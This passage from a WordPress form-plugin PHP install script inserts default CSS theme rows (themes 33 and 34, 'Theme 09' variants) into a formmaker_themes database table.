bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(33, \'Theme 09 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #015875;\r\nmargin-bottom: 10px;\r\ncolor: #015875;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #015875 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	 background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #015875;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #015875;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #015875;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #80ABBA !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #DEE9EC;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #5C90A2;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/03/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(34, \'Theme 09 transparent (lightgreen button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #30D1B1;\r\nmargin-bottom: 10px;\r\ncolor: #30D1B1;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #30D1B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	